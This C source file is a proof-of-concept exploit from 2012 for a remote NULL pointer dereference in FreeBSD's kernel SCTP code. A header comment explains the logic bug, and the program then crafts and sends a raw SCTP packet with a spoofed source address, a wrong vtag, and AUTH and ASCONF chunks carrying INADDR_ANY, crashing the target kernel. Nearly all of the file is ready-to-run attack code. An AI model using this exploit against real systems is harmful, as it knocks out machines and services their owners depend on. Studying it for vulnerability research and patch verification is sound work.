/*
 * FreeBSD kernel SCTP (latest release) remote NULL ptr dereference DoS
 *
 * by Shaun Colley <scolley@ioactive.com>, 2 Aug 2012
 *
 * The SCTP implementation used by FreeBSD ("reference implementation") is vulnerable to a remote
 * NULL pointer dereference in kernel due to a logic bug. When parsing ASCONF chunks, an attempt is
 * made to find an association by address. if the address found is INADDR_ANY, sctp_findassoc_by_vtag()
 * is called and an attempt is made to find an association by vtag. Before searching for the vtag in a
 * hash table, a pointer is set to NULL, with the intention of redefining it after finding the association.
 * However, if the specified vtag is not found, the function returns and the ptr is never reinitialised,
 * causing a kernel panic when the NULL pointer is later dereferenced by the SCTP_INP_DECR_REF macro when
 * flow returns to sctp_process_control().
 *
 * i.e.
 *
 *         static struct sctp_tcb *
 *             sctp_findassoc_by_vtag(struct sockaddr *from, uint32_t vtag,
 *                    struct sctp_inpcb **inp_p, struct sctp_nets **netp, uint16_t rport,
 *                     uint16_t lport, int skip_src_check)
 *
 *	     {
 *
 *	     [ ... ]
 *
 *          *netp = NULL;
 *            *inp_p = NULL;
 *
 *           [ ... ]
 *
 *           head = &sctppcbinfo.sctp_asochash[SCTP_PCBHASH_ASOC(vtag,
 *			 1690             sctppcbinfo.hashasocmark)];
 *           if (head == NULL) {
 *	            // invalid vtag
 *	            SCTP_INP_INFO_RUNLOCK();
 *	            return (NULL);
 *	    }
 *
 * The page fault is a write AV at 0x0 + 0x33c but since there is no associated user context, this
 * doesn't appear to be exploitable (i.e. by mapping the NULL page)
 *
 * Tested against FreebSD 8.2-RELEASE but latest release is also vulnerable. The target system must have an open
 * SCTP port
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <string.h>

/* sctp checksum implementation, basically ripped from wireshark */
#define SP_LEN 2
#define DP_LEN 2
#define VTAG_LEN 4
#define CHK_LEN 4
#define HEADER_LEN    (SP_LEN + DP_LEN + VTAG_LEN + CHK_LEN)
#define CRC32C(c, d) (c = (c >> 8) ^ crc_c[(c ^(d)) & 0xFF])

/* SCTP chunk types */
#define SCTP_AUTH       0x0f
#define SCTP_ASCONF 	0xc1

static int crc_c[256] = {
	0x00000000L, 0xF26B8303L, 0xE13B70F7L, 0x1350F3F4L,
	0xC79A971FL, 0x35F1141CL, 0x26A1E7E8L, 0xD4CA64EBL,
	0x8AD958CFL, 0x78B2DBCCL, 0x6BE22838L, 0x9989AB3BL,
	0x4D43CFD0L, 0xBF284CD3L, 0xAC78BF27L, 0x5E133C24L,
	0x105EC76FL, 0xE235446CL, 0xF165B798L, 0x030E349BL,
	0xD7C45070L, 0x25AFD373L, 0x36FF2087L, 0xC494A384L,
	0x9A879FA0L, 0x68EC1CA3L, 0x7BBCEF57L, 0x89D76C54L,
	0x5D1D08BFL, 0xAF768BBCL, 0xBC267848L, 0x4E4DFB4BL,
	0x20BD8EDEL, 0xD2D60DDDL, 0xC186FE29L, 0x33ED7D2AL,
	0xE72719C1L, 0x154C9AC2L, 0x061C6936L, 0xF477EA35L,
	0xAA64D611L, 0x580F5512L, 0x4B5FA6E6L, 0xB93425E5L,
	0x6DFE410EL, 0x9F95C20DL, 0x8CC531F9L, 0x7EAEB2FAL,
	0x30E349B1L, 0xC288CAB2L, 0xD1D83946L, 0x23B3BA45L,
	0xF779DEAEL, 0x05125DADL, 0x1642AE59L, 0xE4292D5AL,
	0xBA3A117EL, 0x4851927DL, 0x5B016189L, 0xA96AE28AL,
	0x7DA08661L, 0x8FCB0562L, 0x9C9BF696L, 0x6EF07595L,
	0x417B1DBCL, 0xB3109EBFL, 0xA0406D4BL, 0x522BEE48L,
	0x86E18AA3L, 0x748A09A0L, 0x67DAFA54L, 0x95B17957L,
	0xCBA24573L, 0x39C9C670L, 0x2A993584L, 0xD8F2B687L,
	0x0C38D26CL, 0xFE53516FL, 0xED03A29BL, 0x1F682198L,
	0x5125DAD3L, 0xA34E59D0L, 0xB01EAA24L, 0x42752927L,
	0x96BF4DCCL, 0x64D4CECFL, 0x77843D3BL, 0x85EFBE38L,
	0xDBFC821CL, 0x2997011FL, 0x3AC7F2EBL, 0xC8AC71E8L,
	0x1C661503L, 0xEE0D9600L, 0xFD5D65F4L, 0x0F36E6F7L,
	0x61C69362L, 0x93AD1061L, 0x80FDE395L, 0x72966096L,
	0xA65C047DL, 0x5437877EL, 0x4767748AL, 0xB50CF789L,
	0xEB1FCBADL, 0x197448AEL, 0x0A24BB5AL, 0xF84F3859L,
	0x2C855CB2L, 0xDEEEDFB1L, 0xCDBE2C45L, 0x3FD5AF46L,
	0x7198540DL, 0x83F3D70EL, 0x90A324FAL, 0x62C8A7F9L,
	0xB602C312L, 0x44694011L, 0x5739B3E5L, 0xA55230E6L,
	0xFB410CC2L, 0x092A8FC1L, 0x1A7A7C35L, 0xE811FF36L,
	0x3CDB9BDDL, 0xCEB018DEL, 0xDDE0EB2AL, 0x2F8B6829L,
	0x82F63B78L, 0x709DB87BL, 0x63CD4B8FL, 0x91A6C88CL,
	0x456CAC67L, 0xB7072F64L, 0xA457DC90L, 0x563C5F93L,
	0x082F63B7L, 0xFA44E0B4L, 0xE9141340L, 0x1B7F9043L,
	0xCFB5F4A8L, 0x3DDE77ABL, 0x2E8E845FL, 0xDCE5075CL,
	0x92A8FC17L, 0x60C37F14L, 0x73938CE0L, 0x81F80FE3L,
	0x55326B08L, 0xA759E80BL, 0xB4091BFFL, 0x466298FCL,
	0x1871A4D8L, 0xEA1A27DBL, 0xF94AD42FL, 0x0B21572CL,
	0xDFEB33C7L, 0x2D80B0C4L, 0x3ED04330L, 0xCCBBC033L,
	0xA24BB5A6L, 0x502036A5L, 0x4370C551L, 0xB11B4652L,
	0x65D122B9L, 0x97BAA1BAL, 0x84EA524EL, 0x7681D14DL,
	0x2892ED69L, 0xDAF96E6AL, 0xC9A99D9EL, 0x3BC21E9DL,
	0xEF087A76L, 0x1D63F975L, 0x0E330A81L, 0xFC588982L,
	0xB21572C9L, 0x407EF1CAL, 0x532E023EL, 0xA145813DL,
	0x758FE5D6L, 0x87E466D5L, 0x94B49521L, 0x66DF1622L,
	0x38CC2A06L, 0xCAA7A905L, 0xD9F75AF1L, 0x2B9CD9F2L,
	0xFF56BD19L, 0x0D3D3E1AL, 0x1E6DCDEEL, 0xEC064EEDL,
	0xC38D26C4L, 0x31E6A5C7L, 0x22B65633L, 0xD0DDD530L,
	0x0417B1DBL, 0xF67C32D8L, 0xE52CC12CL, 0x1747422FL,
	0x49547E0BL, 0xBB3FFD08L, 0xA86F0EFCL, 0x5A048DFFL,
	0x8ECEE914L, 0x7CA56A17L, 0x6FF599E3L, 0x9D9E1AE0L,
	0xD3D3E1ABL, 0x21B862A8L, 0x32E8915CL, 0xC083125FL,
	0x144976B4L, 0xE622F5B7L, 0xF5720643L, 0x07198540L,
	0x590AB964L, 0xAB613A67L, 0xB831C993L, 0x4A5A4A90L,
	0x9E902E7BL, 0x6CFBAD78L, 0x7FAB5E8CL, 0x8DC0DD8FL,
	0xE330A81AL, 0x115B2B19L, 0x020BD8EDL, 0xF0605BEEL,
	0x24AA3F05L, 0xD6C1BC06L, 0xC5914FF2L, 0x37FACCF1L,
	0x69E9F0D5L, 0x9B8273D6L, 0x88D28022L, 0x7AB90321L,
	0xAE7367CAL, 0x5C18E4C9L, 0x4F48173DL, 0xBD23943EL,
	0xF36E6F75L, 0x0105EC76L, 0x12551F82L, 0xE03E9C81L,
	0x34F4F86AL, 0xC69F7B69L, 0xD5CF889DL, 0x27A40B9EL,
	0x79B737BAL, 0x8BDCB4B9L, 0x988C474DL, 0x6AE7C44EL,
	0xBE2DA0A5L, 0x4C4623A6L, 0x5F16D052L, 0xAD7D5351L,
};

static unsigned int sctp_crc32c(const unsigned char *buf, unsigned int len) {

	unsigned int i;
	unsigned int crc32 = ~0U;
	unsigned int r;
	unsigned char b0, b1, b2, b3;

	for(i = 0; i < SP_LEN + DP_LEN + VTAG_LEN; i++)
		CRC32C(crc32, buf[i]);

	CRC32C(crc32, 0);
	CRC32C(crc32, 0);
	CRC32C(crc32, 0);
	CRC32C(crc32, 0);
	for (i = HEADER_LEN; i < len; i++)
		CRC32C(crc32, buf[i]);

	r = ~crc32;

	b0 = r & 0xff;
	b1 = (r >> 8) & 0xff;
	b2 = (r >> 16) & 0xff;
	b3 = (r >> 24) & 0xff;
	crc32 = ((b0 << 24) | (b1 << 16) | (b2 << 8) | b3);
	return crc32;
}


/* basic sctp header */
struct sctphdr {
	unsigned short sport;
	unsigned short dport;
	unsigned int vtag;
	unsigned csum;
};

/* sctp chunk header */
struct sctp_chunkhdr {
	unsigned char type;
	unsigned char flags;
	unsigned short length;
};

/* ASCONF chunk */
struct sctp_asconf_chunk {
    struct sctp_chunkhdr ch;
    unsigned int serial;
};

/* AUTH chunk */
struct sctp_auth_chunk {
    struct sctp_chunkhdr ch;
    unsigned short shared_key_id;
    unsigned short hmac_id;
    unsigned char hmac[0];
};

/* SCTP parameter header */
struct sctp_paramhdr {
	unsigned short type;
	unsigned short length;
};

/* ipv4 address parameter */
struct sctp_ipv4addr_param {
	struct sctp_paramhdr ph;
	unsigned int addr;
};


/* standard crc32 IP checksum */
unsigned short checksum(unsigned short *addr, int len) {

	int nleft = len;
	unsigned int sum = 0;
	unsigned short *w = addr;
	unsigned short answer = 0;

	while(nleft > 1) {
		sum += *w++;
		nleft -= 2;
	}
	if(nleft == 1) {
		*(unsigned char *)(&answer) = *(unsigned char *)w;
		sum += answer;
	}

	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);
	answer = ~sum;
	return answer;
}

int main(int argc, char *argv[]) {

	int sock = 0, ret = 0;
	int on = 1; /* for setsockopt() call */
	struct ip *iph = NULL;
	struct sctphdr *sctph = NULL;
	struct sctp_auth_chunk *auth_chunk = NULL;
	struct sctp_asconf_chunk *asconf_chunk = NULL;
        struct sctp_ipv4addr_param *ipv4_addr = NULL;

	char *crash = NULL;
	struct sockaddr_in sin;
	struct hostent *hp = NULL;

	printf("\n[*] freebsd sctp remote NULL ptr dereference\n\n");

	if(argc < 3) {
		printf("usage: %s <host> <port>\n\n", argv[0]);
		return -1;
	}

	sock = socket(AF_INET, SOCK_RAW, IPPROTO_SCTP);
	if(sock < 0) {
		printf("[*] error making socket!\n");
		return -1;
	}

	/* tell the kernel not to put any IP headers in */
	if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
		printf("[*] setsockopt() error\n");
		return -1;
	}

	hp = gethostbyname(argv[1]);
	if(!hp) {
		printf("[*] couldn't resolve %s\n\n", argv[1]);
		return -1;
	}

	memset(&sin, 0, sizeof(sin));
	sin.sin_family = AF_INET;
	sin.sin_port = htons(atoi(argv[2]));
	memcpy((char *)&sin.sin_addr, hp->h_addr, hp->h_length);

	crash = malloc(20000);
	if(!crash) {
		printf("\n[*] couldn't allocate memory\n");
		return -1;
	}

	printf("[*] building crash packet..\n");

	memset(crash, 0x00, 20000);

	/* fill in IP header */
	iph = (struct ip *)crash;
	iph->ip_hl = 5;
  	iph->ip_v = 4;
  	iph->ip_tos = 0;
        iph->ip_len = 0; /* fill in later when we know... */
  	iph->ip_id = htons(1337);
  	iph->ip_off = 0;
  	iph->ip_ttl = 250;
  	iph->ip_p = 132; /* sctp */
  	iph->ip_sum = 0;

	iph->ip_src.s_addr = inet_addr("1.3.3.7");
  	iph->ip_dst.s_addr = sin.sin_addr.s_addr;

	/* fill in SCTP header */
	sctph = (void *)crash + sizeof(struct ip);
	sctph->sport = htons(0x1234);
	sctph->dport = htons(atoi(argv[2]));
	sctph->vtag = htonl(0x12345);  /* deliberately wrong */
	sctph->csum = 0;

	/* build AUTH chunk */
	auth_chunk = (void *)crash + sizeof(struct ip) + sizeof(struct sctphdr);
	auth_chunk->ch.type = SCTP_AUTH;
	auth_chunk->ch.length = htons(8 + sizeof(struct sctp_auth_chunk));
        auth_chunk->hmac_id = htons(0x1337);
        memset((void *)auth_chunk->hmac, 0x61, 8);

        /* build ASCONF chunk */
        asconf_chunk = (void *)crash + sizeof(struct ip) + sizeof(struct sctphdr) + sizeof(struct sctp_auth_chunk) + 8;
        asconf_chunk->ch.type = SCTP_ASCONF;
        asconf_chunk->ch.length = htons(sizeof(struct sctp_asconf_chunk) + sizeof(struct sctp_ipv4addr_param));
        asconf_chunk->serial = 0x41414141; /* whatever */

        ipv4_addr = (void *)crash + sizeof(struct ip) + sizeof(struct sctphdr) + sizeof(struct sctp_auth_chunk)
                                                                        + 8 + sizeof(struct sctp_asconf_chunk);

	ipv4_addr->ph.length = htons(sizeof(struct sctp_ipv4addr_param));
        ipv4_addr->ph.type = htons(0x0005);
        ipv4_addr->addr = INADDR_ANY; /* this takes us down the bad code path */

        /* what's the length of the whole packet? */
        iph->ip_len = sizeof(struct ip) + sizeof(struct sctphdr) + sizeof(struct sctp_auth_chunk) + 8 + sizeof(struct sctp_asconf_chunk)
                                                                                              + sizeof(struct sctp_ipv4addr_param);

        /* calculate IP checksum */
	iph->ip_sum = checksum((unsigned short *)crash, iph->ip_len >> 1);

	/* calculate SCTP checksum */
	sctph->csum = htonl(sctp_crc32c((const unsigned char *)sctph, sizeof(struct sctphdr) + sizeof(struct sctp_auth_chunk) + 8
                                                                                           + sizeof(struct sctp_asconf_chunk)
                                                                                         + sizeof(struct sctp_ipv4addr_param)));

	printf("[*] sending packet..\n\n");

	/* send the bad packet */
	ret = sendto(sock, crash, iph->ip_len, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr));
	if(ret < 0) {
		printf("[*] error sending packet\n");
		return -1;
	}

	printf("[*] done, bad packet sent!\n\n");

	free(crash);
	close(sock);

	return 0;

}